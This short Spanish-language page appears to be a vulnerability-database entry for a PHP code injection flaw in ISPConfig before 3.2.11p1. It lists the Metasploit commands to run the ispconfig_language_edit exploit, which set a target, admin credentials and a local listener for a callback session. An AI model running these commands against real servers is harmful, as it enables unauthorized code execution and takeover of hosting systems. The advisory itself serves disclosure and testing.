
Módulos de Metasploit
Módulo de Metasploit

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
Se descubrió un problema en ISPConfig anterior a 3.2.11p1. Se puede lograr una inyección de código PHP en el editor de archivos de idioma por parte de un administrador si admin_allow_langedit está habilitado.